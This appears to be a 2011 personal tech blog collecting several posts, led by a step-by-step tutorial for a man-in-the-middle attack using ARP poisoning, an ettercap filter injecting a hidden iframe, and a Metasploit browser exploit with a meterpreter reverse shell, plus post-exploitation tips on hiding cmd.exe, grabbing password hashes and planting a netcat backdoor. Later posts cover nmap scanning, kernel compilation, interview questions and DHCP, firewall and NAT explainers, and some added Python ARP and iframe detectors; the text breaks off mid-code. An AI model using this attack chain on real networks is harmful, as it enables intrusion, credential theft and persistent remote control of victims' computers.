Monday, May 30, 2011

MITM Browser Injection Attack With Backtrack and Ettercap

The instructions contained below are provided for informational\educational purposes only and should only be used on networks that you control, or have permission to utilize.

Conditions: Access to the network has already been gained by either wireless cracking or some other access to a wired network. The target's IP and operating system have already been discovered, as well as the gateway IP address. The test computer, the target and the gateway are all on the same subnet. The target is a patched Windows XP machine running SP3 and IE8.

The attack will begin with a basic MITM (Man-In-The-Middle) ARP poisoning attack against a single target on a network.

The network traffic, specifically the Web pages browsed by the target, will be intercepted by the test computer, and an iframe will be injected into all of the web pages viewed. This iframe will point back to the test computer, which will be hosting a web page with a malicious payload (via the Metasploit framework).

When the user browses to most web pages this iframe will execute the malicious content hosted on the test computer in their browser. The end result will be admin\root access to the target's computer via a meterpreter session.
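
Seen from the defending side, the ARP poisoning step described above shows up as the gateway's IP suddenly answering from a different MAC address, and as one MAC address claiming several IPs. The following is an added example (not part of the original post) that flags both conditions in a list of ARP replies; the capture lines are constructed in the style of `tcpdump -n arp` output, and the addresses and the function name `find_arp_anomalies` are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in the style of `tcpdump -n arp` output (not real traffic).
# Assumed roles: 192.168.1.1 = gateway, .50 = workstation,
# .66 = host that starts answering for other IPs at 09:05.
SAMPLE_CAPTURE = """\
09:00:01.100 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
09:00:01.200 ARP, Reply 192.168.1.50 is-at 00:aa:bb:cc:dd:01, length 28
09:00:02.300 ARP, Reply 192.168.1.66 is-at 00:de:ad:be:ef:66, length 28
09:05:10.000 ARP, Reply 192.168.1.1 is-at 00:de:ad:be:ef:66, length 28
09:05:10.010 ARP, Reply 192.168.1.50 is-at 00:de:ad:be:ef:66, length 28
09:05:11.000 ARP, Reply 192.168.1.1 is-at 00:de:ad:be:ef:66, length 28
"""

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"is-at (?P<mac>[0-9a-f]{2}(?::[0-9a-f]{2}){5})",
    re.IGNORECASE,
)


def find_arp_anomalies(capture_text, gateway_ip=None):
    """Return alerts for IP->MAC rebinding and for one MAC answering for several IPs."""
    first_mac = {}                 # ip -> MAC learned first (the baseline)
    ips_by_mac = defaultdict(set)  # mac -> every IP it has claimed
    reported = set()               # (ip, mac) pairs already alerted on
    alerts = []

    for line in capture_text.splitlines():
        m = ARP_REPLY.match(line.strip())
        if m is None:
            continue  # not an ARP reply line
        ts, ip, mac = m["ts"], m["ip"], m["mac"].lower()
        ips_by_mac[mac].add(ip)
        baseline = first_mac.setdefault(ip, mac)
        # An IP that moves to a new MAC is the core symptom of ARP poisoning.
        if mac != baseline and (ip, mac) not in reported:
            reported.add((ip, mac))
            alerts.append({
                "type": "rebind", "time": ts, "ip": ip,
                "old_mac": baseline, "new_mac": mac,
                "severity": "high" if ip == gateway_ip else "medium",
            })

    # One MAC claiming several IPs: the interceptor answers for both of its victims.
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            alerts.append({"type": "shared_mac", "mac": mac, "ips": sorted(ips)})
    return alerts


if __name__ == "__main__":
    for alert in find_arp_anomalies(SAMPLE_CAPTURE, gateway_ip="192.168.1.1"):
        print(alert)
```

A rebind can also be benign (DHCP reassignment, a replaced NIC, failover), so treat an alert as a lead to verify. Switches that support Dynamic ARP Inspection can drop spoofed replies at the port.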

Prepare Backtrack

Open a terminal session and type

/usr/bin/start-network

This command enables the networking on Backtrack. Now you need to update Metasploit. In a terminal type:

cd /pentest/exploit/framework3

This brings us to the Metasploit directory. Type in:

svn update (at the prompt type y)

This will update the Metasploit framework with the latest modules. Now you need to enable IP forwarding using iptables. Enter the following in a terminal window

echo 1 > /proc/sys/net/ipv4/ip_forward

Ensure IP forwarding is enabled in ettercap. You need to edit the etter.conf file. Type Kate from a terminal for a GUI text editor or choose it from the Utilities menu. If you're using Backtrack4 Final Release the file can usually be found here: /etc/etter.conf. You need to make 3 changes in etter.conf:

ec_uid = 0

ec_gid = 0

Uncomment the redir_command_on and redir_command_off sections below the "if you use iptables" section of etter.conf

Prepare Ettercap filter

Ettercap is a network sniffer that can not only log packet data but can use filters to inject or replace data within the packets. When used in a MITM attack ettercap filters can drop packets, or inject code into packets that will be forwarded to the target machine. Enter this data into a text file using your favorite text editor and save it as iframe.txt:

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("(/title)", "(/title>)iframe src="http://youripaddress" width=0 height=0>(/iframe)");
msg("iframe Filter Ran.\n");
}

The above filter will put our iframe right before the closing body tag in most web sites. Now from a terminal and in the same directory where you saved iframe.txt enter:

etterfilter iframe.txt -o iframe.ef

This command compiles the iframe.txt file into the actual ettercap filter, or "ef" file. A success message would look like this: Script encoded into 15 instructions.

Launch Metasploit

From the /pentest/exploit/framework3 directory launch the Metasploit console with this command:

msfconsole

You can choose your favorite browser exploit, for example: windows/browser/ms10_xxx_helpctr_xss_cmd_exec. Metasploit commands:

Use windows/browser/ms10_xxx_helpctr_xss_cmd_exec

Set PAYLOAD windows/meterpreter/reverse_tcp

Set LHOST youripaddress

Set SRVHOST youripaddress

Set SRVPORT 80

Exploit

Launch Ettercap for MITM attack

Enter the following command into a terminal window (replace underlined items with the correct name in your environment):

ettercap -i wlan -F iframe.ef -TQM arp:remote /targetip/ /gatewayip/ -P autoadd

The -i switch specifies the interface; you only need it if you have multiple interfaces. If you have only one you can omit it. -F specifies the filter to use. T = text mode, Q = quiet, M = MITM attack.

You may see that only one of the addresses is added to an ettercap group. This is not uncommon with wireless clients. Both the gateway and the target need to show up in one of the groups. You can either wait until your target sends an ARP request or you can force it to by pinging a nonexistent IP on your subnet from the target. The choice is yours.

Once ettercap is running, open up IE on your target and browse somewhere. You should see the "iframe filter run" message on your Backtrack box. You should also see the exploit initiate on the Metasploit terminal. On your victim box a message will pop up. If you click allow, the exploit will run. You should then see a meterpreter session initiated on your Backtrack computer. You can hit CTRL+C, then type sessions -i 1 to interact with the meterpreter session.

You've compromised the box! You can now do things like drop to a command shell on the target by entering shell into meterpreter. If you want to be surreptitious you could enter execute -F cmd.exe -i -H -c. There are many things you can do with a successful meterpreter session setup. You can upload\download files, grab password hashes, send over a secure back door program like netcat or edit the registry.
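
The filter in this post leaves two artifacts a defender can look for: a request header that still carries a content-coding list under a name other than Accept-Encoding, and an invisible iframe pointing at a host other than the site being viewed. The check below is an added example, not part of the original post; the sample request and page are constructed, and the function names, host names and addresses are assumptions.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Constructed samples: a request as a proxy or server would log it after the
# header rewrite, and a page as the client would receive it after injection.
TAMPERED_REQUEST = (
    "GET /news HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    "Accept: text/html,application/xhtml+xml;q=0.9\r\n"
    "Accept-Rubbish!: gzip, deflate\r\n"
    "Connection: keep-alive\r\n\r\n"
)
TAMPERED_PAGE = (
    "<html><head><title>News</title>"
    '<iframe src="http://192.168.1.66" width=0 height=0></iframe></head>'
    '<body><iframe src="http://video.example.test/embed/1" width="560" '
    'height="315"></iframe></body></html>'
)

CODINGS = {"gzip", "x-gzip", "deflate", "compress", "br", "zstd", "identity"}
CODING_HEADERS = {"accept-encoding", "te", "content-encoding"}


def renamed_encoding_headers(raw_request):
    """Header names whose value is a content-coding list but whose name is not
    one that legitimately carries one. A same-length rename keeps the value."""
    suspicious = []
    for line in raw_request.split("\r\n")[1:]:
        if not line:
            break  # end of the header block
        name, sep, value = line.partition(":")
        if not sep:
            continue
        tokens = {t.split(";")[0].strip().lower() for t in value.split(",")}
        tokens.discard("")
        if tokens and tokens <= CODINGS and name.strip().lower() not in CODING_HEADERS:
            suspicious.append(name.strip())
    return suspicious


class _IframeFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.frames.append({k: (v or "") for k, v in attrs})


def _is_zero(value):
    v = value.strip().lower()
    if v.endswith("px"):
        v = v[:-2]
    return v.strip() == "0"


def hidden_offsite_iframes(html, page_host):
    """Invisible iframes whose src points at a host other than the page's own."""
    finder = _IframeFinder()
    finder.feed(html)
    findings = []
    for attrs in finder.frames:
        style = attrs.get("style", "").replace(" ", "").lower()
        invisible = (_is_zero(attrs.get("width", "")) or _is_zero(attrs.get("height", ""))
                     or "display:none" in style or "visibility:hidden" in style)
        host = urlsplit(attrs.get("src", "")).hostname or ""
        if not invisible or not host or host == page_host.lower():
            continue
        try:
            private = ipaddress.ip_address(host).is_private
        except ValueError:
            private = False  # src uses a host name, not an IP literal
        findings.append({"src": attrs["src"], "host": host, "private_ip": private})
    return findings


def inspect_exchange(raw_request, html, page_host):
    return {
        "renamed_headers": renamed_encoding_headers(raw_request),
        "hidden_iframes": hidden_offsite_iframes(html, page_host),
    }


if __name__ == "__main__":
    print(inspect_exchange(TAMPERED_REQUEST, TAMPERED_PAGE, "www.example.test"))
```

Both artifacts exist only because the page travelled over plain HTTP; a site served over HTTPS with a validated certificate gives an on-path host nothing to rewrite.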

Friday, May 27, 2011

Get NMAP on UBUNTU

IP and Port scanning using ‘nmap (Network Mapper)’ in Ubuntu

October 20, 2007 by taufanlubis

nmap is a powerful scanner available on Unix/Linux systems. It’s very useful for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.

It’s very easy to install nmap in Ubuntu, just download from the internet.

taufanlubis@zyrex:~$ sudo apt-get install nmap



In this practice, I used 2 computers.

PC-01, IP = 192.168.0.3 (OpenSuse 10.1) with Kernel 2.6.16.13-4-default

PC-02, IP = 192.168.0.2 (Ubuntu Feisty)

I run nmap from Ubuntu to scan PC-01.



IP Scanning with range 192.168.0.0 – 192.168.0.255

taufanlubis@zyrex:~$ sudo nmap -sP 192.168.0.0/24

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:51 WIT

Host 192.168.0.2 appears to be up.

caught SIGINT signal, cleaning up

taufanlubis@zyrex:~$



IP Scanning with range 192.168.0.1 – 192.168.0.254

taufanlubis@zyrex:~$ sudo nmap -sP 192.168.0.1-254

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 21:53 WIT

Host 192.168.0.2 appears to be up.

Host 192.168.0.3 appears to be up.

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Nmap finished: 255 IP addresses (2 hosts up) scanned in 31.242 seconds

taufanlubis@zyrex:~$



Port Scanning with range port 100 – port 139

taufanlubis@zyrex:~$ nmap 192.168.0.3 -p100-139

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:06 WIT

Interesting ports on 192.168.0.3:

Not shown: 38 filtered ports

PORT STATE SERVICE

113/tcp closed auth

139/tcp open netbios-ssn

Nmap finished: 1 IP address (1 host up) scanned in 24.914 seconds

taufanlubis@zyrex:~$

For 40 ports, it took almost 25 seconds, so it will take much longer if you want to scan from 1-65535 (all ports on a computer).



Scanning Operating system on target IP

taufanlubis@zyrex:~$ sudo nmap -O 192.168.0.3

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:20 WIT

Interesting ports on 192.168.0.3:

Not shown: 1693 filtered ports

PORT STATE SERVICE

80/tcp open http

113/tcp closed auth

139/tcp open netbios-ssn

445/tcp open microsoft-ds

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Device type: general purpose|specialized|WAP|storage-misc

Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Atmel Linux 2.6.X (91%), Siemens linux (91%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Inventel embedded (88%)

Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (91%), Siemens Gigaset SE515dsl wireless broadband router (91%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop



OS detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 94.942 seconds

taufanlubis@zyrex:~$



nmap Faster Execution

If you want a faster scan, use the -T4 option on the nmap command.

taufanlubis@zyrex:~$ sudo nmap -A -T4 192.168.0.3

Starting Nmap 4.20 ( http://insecure.org ) at 2007-10-16 22:42 WIT

Interesting ports on 192.168.0.3:

Not shown: 1693 filtered ports

PORT STATE SERVICE VERSION

80/tcp open http Apache httpd 2.2.0 ((Linux/SUSE))

113/tcp closed auth

139/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)

445/tcp open netbios-ssn Samba smbd 3.X (workgroup: HOME)

MAC Address: 00:0D:88:B3:72:F3 (D-Link)

Device type: general purpose|WAP|specialized|storage-misc|broadband router

Running (JUST GUESSING) : Linux 2.6.X|2.4.X (97%), Siemens linux (93%), Atmel Linux 2.6.X (92%), Inventel embedded (89%), Linksys Linux 2.4.X (89%), Asus Linux 2.4.X (89%), Maxtor Linux 2.4.X (89%), Netgear embedded (87%)

Aggressive OS guesses: Linux 2.6.13 – 2.6.18 (97%), Siemens Gigaset SE515dsl wireless broadband router (93%), Linux 2.6.11 – 2.6.15 (Ubuntu or Debian) (93%), Linux 2.6.15-27-686 (Ubuntu Dapper, X86) (93%), Atmel AVR32 STK1000 development board (runs Linux 2.6.16.11) (92%), Linux 2.6.14 – 2.6.17 (92%), Linux 2.6.17 – 2.6.18 (x86) (92%), Linux 2.6.17.9 (X86) (92%), Linux 2.6.9-42.0.2.EL (RedHat Enterprise Linux) (92%), Linux 2.6.9 – 2.6.12 (x86) (92%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop



OS and Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .

Nmap finished: 1 IP address (1 host up) scanned in 58.830 seconds

taufanlubis@zyrex:~$

Now, you only need 58.83 seconds compared to 94.94 seconds (without the -T4 option).



For more details, just open the nmap manual.

taufanlubis@zyrex:~$ man nmap

Monday, May 23, 2011

Make your own Linux - Check how..

How to download Linux Kernel

http://www.kernel.org/

How to: Compile Linux kernel 2.6

Compiling a custom kernel has its own advantages and disadvantages. However, new Linux users and admins often find it difficult to compile the Linux kernel. Compiling a kernel requires understanding a few things and then typing a couple of commands. This step-by-step howto covers compiling Linux kernel version 2.6.xx under Debian GNU/Linux. However, the instructions remain the same for any other distribution except for the apt-get command.
Step # 1 Get Latest Linux kernel code

Visit http://kernel.org/ and download the latest source code. The file name would be linux-x.y.z.tar.bz2, where x.y.z is the actual version number. For example, the file linux-2.6.25.tar.bz2 represents the 2.6.25 kernel version. Use the wget command to download the kernel source code:
$ cd /tmp
$ wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-x.y.z.tar.bz2

Note: Replace x.y.z with actual version number.
Step # 2 Extract tar (.tar.bz2) file

Type the following command:
# tar -xjvf linux-2.6.25.tar.bz2 -C /usr/src
# cd /usr/src/linux-2.6.25
Step # 3 Configure kernel

Before you configure the kernel, make sure the development tools (gcc compilers and related tools) are installed on your system. If the gcc compiler and tools are not installed, use the apt-get command under Debian Linux to install them.
# apt-get install gcc

Now you can start kernel configuration by typing any one of the command:

* $ make menuconfig - Text based color menus, radiolists & dialogs. This option is also useful on a remote server if you want to compile the kernel remotely.
* $ make xconfig - X windows (Qt) based configuration tool, works best under the KDE desktop.
* $ make gconfig - X windows (Gtk) based configuration tool, works best under the Gnome desktop.

For example make menuconfig command launches following screen:
$ make menuconfig

You have to select different options as per your need. Each configuration option has HELP button associated with it so select help button to get help.
Step # 4 Compile kernel

Start compiling to create a compressed kernel image, enter:
$ make
Start compiling the kernel modules:
$ make modules

Install kernel modules (become a root user, use su command):
$ su -
# make modules_install
Step # 5 Install kernel

So far we have compiled kernel and installed kernel modules. It is time to install kernel itself.
# make install

It will install three files into the /boot directory and modify your kernel grub configuration file:

* System.map-2.6.25
* config-2.6.25
* vmlinuz-2.6.25

Step # 6: Create an initrd image

Type the following command at a shell prompt:
# cd /boot
# mkinitrd -o initrd.img-2.6.25 2.6.25

An initrd image contains the device drivers needed to load the rest of the operating system later on. Not all computers require an initrd, but it is safe to create one.
Step # 7 Modify Grub configuration file - /boot/grub/menu.lst

Open file using vi:
# vi /boot/grub/menu.lst

title Debian GNU/Linux, kernel 2.6.25 Default
root (hd0,0)
kernel /boot/vmlinuz root=/dev/hdb1 ro
initrd /boot/initrd.img-2.6.25
savedefault
boot

Remember to set up the correct root=/dev/hdXX device. Save and close the file. If you think editing and writing all lines by hand is too much for you, try out the update-grub command to update the lines for each kernel in the /boot/grub/menu.lst file. Just type the command:
# update-grub
Neat. Huh?
Step # 8 : Reboot computer and boot into your new kernel

Just issue reboot command:
# reboot
For more information see:

* Our Exploring Linux kernel article and Compiling Linux Kernel module only.
* Official README file has more information on kernel and software requirements to compile it. This file is in the kernel source directory tree.
* Documentation/ directory has interesting kernel documentation for you in kernel source tree.



Enjoy by Vjss

Thursday, May 19, 2011

Troubleshooting VM issues..

What I am trying to do here... On the host computer I got Win7 and I've installed VMware Workstation on it, and in there I got WinXP. Now I want to create a network between my host Win7 and VM XP..
Error : "The network bridge on device /dev/vmnet0 is temporarily down because the bridged Ethernet interface is down. The virtual machine may not be able to communicate with the host... or with other machines on your network." 

Wednesday, May 18, 2011

My Pets :)






















Prepare yourself for..

1. Explain Boot Process
2. Explain OSI Model
3. Explain working of DNS and DHCP
4. In DNS, what is
   i) Recursive and Iterative Query
   ii) Kind of Records in DNS
   iii) Root hints
   iv) nslookup
5. How to promote and demote a server (Ans. dcpromo)
6. A client machine does not have internet connection. How will you troubleshoot?
7. Define
   i) Encryption
   ii) PKI
   iii) Certificate
   iv) Firewall
8. What is Group Policy (GP)? In what sequence does it apply (Ans. Local, Sites, Domain then OU)? What GP takes precedence, "Allow" or "Deny" (Ans. Deny)?
9. Group Policy is not applying on a client machine. How will you troubleshoot? What tools will you use to detect what GPs are getting applied on the client machine [Ans. Gpresult and Resultant Set of Policies (Rsop)]

   Ans. Check for Event ID 1030 and 1058 on the client machine. The policy which is not getting applied on the client machine will be mentioned in the Events (1030/1058). Try to ping that policy from the client machine. Check whether that policy is present on the server under the C:\Windows\Sysvol\sysvol\domain.local\Policies folder. If present, check whether we are able to access that Policies folder from the client machine via \\Server name\sysvol. Check whether sysvol is shared on the server (start -> cmd -> net share).
10. Difference between Domain and Workgroup.
11. What are the kinds of Deployment services? Difference between .msi and .exe file.
12. Difference between FAT and NTFS
13. What is nbtstat, MAC Address, APIPA, Netmon (Network Monitor tool)? What are the IP classes?
14. Explain FSMO roles
15. What are the security differences between Windows 2003 and Windows 2008 server?
16. What is the database filename for Active Directory and where is it stored? (Ans. C:\Windows\NTDS\ntds.dit)
17. What does System state consist of?
18. How will you create a user on the server (Administrative tools → AD Users and Computers .. right click Create a new user)

    How will you create a local user on a client machine (Ans. Right click My Computer → Manage .. Create a new user)
19. What is Tombstone and Journal Wrap in AD?
20. DORA process
21. Iterative and recursive DNS query
22. Forward and reverse DNS lookup zones

Posted by Vj 

Tuesday, May 17, 2011

Tum Shankar~~




















Learn

What is DHCP?

The Internet is a vast source of information that is continuously updated and accessed via computers and other devices. For a device (also referred to as a host) to connect to the Internet, it must have, among other configurations, an Internet Protocol (IP) address. The IP address is the computer's address on the Internet. A common comparison for an IP address is an individual's telephone number, which is an identifier people use to communicate with the individual. Up until the late 1980s, configuring a computer to connect to the Internet was a manual process. The Bootstrap Protocol (BOOTP) was the first Transmission Control Protocol/Internet Protocol (TCP/IP) network configuration tool to remove the task of manually assigning IP addresses by automating the process.
While the introduction of the BOOTP network protocol was a welcome innovation for network administrators tasked with managing large numbers of computers on a network, it was the first attempt and a new and improved TCP/IP network protocol soon followed. This protocol is called Dynamic Host Configuration Protocol (DHCP). DHCP was not designed as a replacement for BOOTP, but an extension of its functionality.

How DHCP Works

As its name indicates, DHCP provides dynamic IP address assignment. What this means is that instead of having to rely on a specific IP address, a computer will be assigned one that is available from a subnet or "pool" that is assigned to the network. DHCP also extends BOOTP functionality to provide IP addresses that expire. BOOTP indirectly uses a form of leasing that never expired, but the term wasn't actually used until the introduction of DHCP. When DHCP assigns an IP address, it actually leases the identifier to the host computer for a specific amount of time. The default lease is five days, but a network administrator should evaluate their own particular circumstances to determine an appropriate lease.
In basic terms, the DHCP lease process works as follows:
  1. A network device attempts to connect to the Internet.
  2. The network requests an IP address.
  3. The DHCP server allocates (leases) the network device an IP address, which is forwarded to the network by a router.
  4. DHCP updates the appropriate network servers with the IP address and other configuration information.
  5. The network device accepts the IP address.
  6. The IP address lease expires.
  7. DHCP either reallocates the IP address or leases one that is available.
  8. The network device is no longer connected to the Internet.
  9. The IP address becomes an available address in the network pool of IP addresses.
To set up DHCP, you basically need a DHCP-supported client (at least one), a router, and a DHCP server. The client is a computer or other device on a network that requires an IP address and/or other network configuration information. The router functions as a forwarding (or routing) agent of IP address requests from the DHCP server. The DHCP server is key to the entire operation. It is responsible for allocating, leasing, reallocating, and renewing IP addresses. Windows and Linux both support DHCP software.

Learn

What is a Firewall?

A firewall is a security device that can be a software program or a dedicated network appliance. The main purpose of a firewall is to separate a secure area from a less secure area and to control communications between the two. Firewalls can perform a variety of other functions, but are chiefly responsible for controlling inbound and outbound communications on anything from a single machine to an entire network.

Software Firewalls

Software firewalls, also sometimes called personal firewalls, are designed to run on a single computer. These are most commonly used on home or small office computers that have broadband access, which tend to be left on all the time. A software firewall prevents unwanted access to the computer over a network connection by identifying and preventing communication over risky ports. Computers communicate over many different recognized ports, and the firewall will tend to permit these without prompting or alerting the user. For example, computers access Web pages over port 80 and use port 443 for secure Web communications. A home computer would expect to receive data over these ports. However, a software firewall would probably block any access from the Internet over port 421, over which it does not expect to receive data. Additionally, port 421 has been used by certain Trojans (a type of malware) in the past. Software firewalls can also detect "suspicious" activity from the outside. They can block access to a home computer from an outside address when activity matches certain patterns, like port scanning.
A software firewall also allows certain programs on the user's computer to access the Internet, often by express permission of the user. Windows Update, antivirus software, and Microsoft Word are a few programs that a user might legitimately expect to access the Internet. However, a program called gator.exe that is attempting to access the Internet when it shouldn't be running might be reason for concern, so the user could decline access for this program. This is a useful feature when spyware, adware or some type of malware is suspected.
Some software firewalls also allow configuration of trusted zones. These permit unlimited communication over a wide variety of ports. This type of access may be necessary when a user starts a VPN client to reach a corporate intranet.
One drawback to software firewalls is that they are software running on a personal computer operating system. If the underlying operating system is compromised, then the firewall can be compromised as well. Since many other programs also run on a home computer, malicious software could potentially enter the computer through some other application and compromise the firewall. Software firewalls also rely heavily upon the user making the right decisions. If someone using a software firewall mistakenly gives a keylogger or a Trojan permission to access the Internet, security on that machine is compromised even though there is nothing wrong with the firewall itself.
There are many different brands of software firewalls, each with their own features. Some examples include ZoneAlarm, BlackICE, and Kerio.

Hardware Firewalls

Hardware firewalls are more complex. They also have software components, but run either on a specially engineered network appliance or on an optimized server dedicated to the task of running the firewall. The operating system underlying a hardware firewall is as basic as possible and very difficult to attack. Since no other software runs on these machines, and configuration takes a little more thought than clicking on an "allow" prompt, they are difficult to compromise and tend to be extremely secure.
A hardware firewall is placed between a network, such as a corporation, and a less secure area, such as the Internet. Firewalls also can separate more secure networks from less secure networks, such as one corporate location within a larger corporate structure. Versions of hardware firewalls are available to home users who want stronger protection from potential Internet attacks. There are many different default configurations for these devices - some allow no communications from the outside and must be configured, using rules, others (like those available for the home market) are already configured to block access over risky ports. Rules can be as simple as allowing port 80 traffic to flow through the firewall in both directions, or as complex as only allowing 1433 (SQL server) traffic from a specific IP address outside of the network through the firewall to a single IP address inside the network.
Firewalls are also used for Network Address Translation (NAT). This allows a network to use private IP addresses that are not routed over the Internet. Private IP address schemes allow organizations (or even household networks) to limit the number of publicly routed IP addresses they use, reserving public addresses for Web servers and other externally accessed network equipment. NAT allows administrators to use one public IP address for all of their users to access the Internet - the firewall is "smart" enough to send the requests back to the requesting workstation's internal IP. NAT also allows users inside a network to contact a server using a private IP while users outside the network must contact the same server using an external IP.
In addition to port and IP address rules, firewalls can have a wide variety of functionality. They can also act as caching servers, VPNs, routers, and more. Some examples of hardware firewalls are CheckPoint, Cisco PIX, SonicWall, Contivity from Nortel, and Linksys (for the home market).
Firewalls are vital to network management. Without this control over computer and network access, large networks could not store sensitive data intended for selective retrieval. Firewalls are also very important for home broadband users - without a home version of one of these products, your personal data is at risk.

Learn

What is a Private IP Address?

When you send a letter from your house to a friend, you have to know the address to send it to so that the postman knows which street and which house to take it to. Computer networks such as the Internet are no different, except that instead of sending your web traffic to "1145 Main Street", your computer's location is known as an IP Address.
An IP address is your computer's equivalent of your postal address and just like the mail service, each computer has to have its own address so that it will only receive the information that is meant for it and not anything that is meant for someone else.
While we are used to writing out streets and house numbers on envelopes, inside your computer IP Addresses are usually represented in what is known as dotted-decimal format such as 124.62.112.7 as this is the system that is understood by computers. As you can see, the address is split into 4 sections known as "octets" and each of the four octets can be numbered from 0-255, providing a total of 4,294,967,296 potentially unique IP Addresses.
Now, while 4.2 billion might seem like a lot, for many years large amounts of these have been allocated and used by large networks such as the backbone providers, ISPs and large universities that made up the early Internet, while other groups have been reserved for special purposes and are not usable, so in practice the real amount is far less than 4.2 billion. The problem that we face today is that with many homes owning more than one computer, and with cell phones, PDAs and even fridges being enabled for Internet access these days, IP Addresses are running out.
When I mentioned above that some blocks of addresses had been reserved for special purposes, one of these purposes was for private networking and it is these private addresses that help to relieve the pressure on the remaining address space and make possible many of the cable and DSL routers that people have at home today to share their Internet connection amongst many PCs.

Private IP address ranges

The ranges and the number of usable IPs are as follows:
10.0.0.0 - 10.255.255.255
Addresses: 16,777,216
172.16.0.0 - 172.31.255.255
Addresses: 1,048,576
192.168.0.0 - 192.168.255.255
Addresses: 65,536

So, what are these addresses and how do they work?

For example, if I had 6 computers that I wanted to network, I might number them from 172.16.0.1 up to 172.16.0.6 and this would still leave over a million more addresses that I could use if I were to buy some more computers or if I was networking a large office and needed lots and lots of addresses.
These blocks of addresses can be used by anyone, anywhere - even if your neighbor is using the exact same addresses this won't cause a problem. This is possible because these addresses are known as "non-routable addresses" and the devices on the Internet that move data from one place to another are specially programmed to recognize these addresses. These devices (known as routers) will recognize that these are private addresses belonging to your network and will never forward your traffic onto the Internet, so for your connection to work you will always require at least one real address from the general pool so that your home router can perform what is known as "Network Address Translation".
NAT is a process where your router changes your private IP Address into a public one so that it can send your traffic over the Internet, keeping track of the changes in the process. When the information comes back to your router, it reverses the change back from a real IP Address into a private one and forwards the traffic back to your computer.
Private addresses and NAT are what make your home router work, and by using them anyone is able to connect as many computers as they wish to the Internet without having to worry about running out of addresses. This gives everyone many more years until all the available addresses are used up.

Learn

What is Network Address Translation?

Network Address Translation (NAT) is the process where a network device, usually a firewall, assigns a public address to a computer (or group of computers) inside a private network. The main use of NAT is to limit the number of public IP addresses an organization or company must use, for both economy and security purposes.
The most common form of network translation involves a large private network using addresses in a private range (10.0.0.0 to 10.255.255.255, 172.16.0.0 to 172.31.255.255, or 192.168.0.0 to 192.168.255.255). The private addressing scheme works well for computers that only have to access resources inside the network, like workstations needing access to file servers and printers. Routers inside the private network can route traffic between private addresses with no trouble. However, to access resources outside the network, like the Internet, these computers have to have a public address in order for responses to their requests to return to them. This is where NAT comes into play.
Internet requests that require Network Address Translation (NAT) are quite complex but happen so rapidly that the end user rarely knows it has occurred. A workstation inside a network makes a request to a computer on the Internet. Routers within the network recognize that the request is not for a resource inside the network, so they send the request to the firewall. The firewall sees the request from the computer with the internal IP. It then makes the same request to the Internet using its own public address, and returns the response from the Internet resource to the computer inside the private network. From the perspective of the resource on the Internet, it is sending information to the address of the firewall. From the perspective of the workstation, it appears that communication is directly with the site on the Internet. When NAT is used in this way, all users inside the private network have the same public IP address when they use the Internet. That means only one public address is needed for hundreds or even thousands of users.
Most modern firewalls are stateful - that is, they are able to set up the connection between the internal workstation and the Internet resource. They can keep track of the details of the connection, like ports, packet order, and the IP addresses involved. This is called keeping track of the state of the connection. In this way, they are able to keep track of the session composed of communication between the workstation and the firewall, and the firewall with the Internet. When the session ends, the firewall discards all of the information about the connection.
There are other uses for Network Address Translation (NAT) beyond simply allowing workstations with internal IP addresses to access the Internet. In large networks, some servers may act as Web servers and require access from the Internet. These servers are assigned public IP addresses on the firewall, allowing the public to access the servers only through that IP address. However, as an additional layer of security, the firewall acts as the intermediary between the outside world and the protected internal network. Additional rules can be added, including which ports can be accessed at that IP address. Using NAT in this way allows network engineers to more efficiently route internal network traffic to the same resources, and allow access to more ports, while restricting access at the firewall. It also allows detailed logging of communications between the network and the outside world.
Additionally, NAT can be used to allow selective access to the outside of the network, too. Workstations or other computers requiring special access outside the network can be assigned specific external IPs using NAT, allowing them to communicate with computers and applications that require a unique public IP address. Again, the firewall acts as the intermediary, and can control the session in both directions, restricting port access and protocols.
NAT is a very important aspect of firewall security. It conserves the number of public addresses used within an organization, and it allows for stricter control of access to resources on both sides of the firewall.
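The stateful translation and published-server behaviour described above can be modelled in a few lines. This is an added Python sketch, not code from the original article; the class name StatefulNat, the starting port 40000 and the documentation-range addresses are assumptions made for illustration.

```python
import ipaddress

# The private ranges quoted in the text above.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

class StatefulNat:
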